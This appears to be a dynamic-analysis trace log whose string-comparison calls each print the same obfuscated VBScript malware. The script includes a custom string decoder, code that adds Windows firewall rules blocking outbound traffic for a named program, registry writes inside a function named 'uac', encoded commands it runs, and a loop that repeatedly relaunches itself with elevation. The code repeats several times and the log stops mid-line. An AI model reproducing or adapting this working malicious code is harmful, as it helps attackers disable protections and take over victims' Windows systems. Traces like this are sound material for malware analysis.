bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.281] wcsncmp (_String1="im index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.281] wcsncmp (_String1="m index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.281] wcsncmp (_String1=" index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.281] wcsncmp (_String1="index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 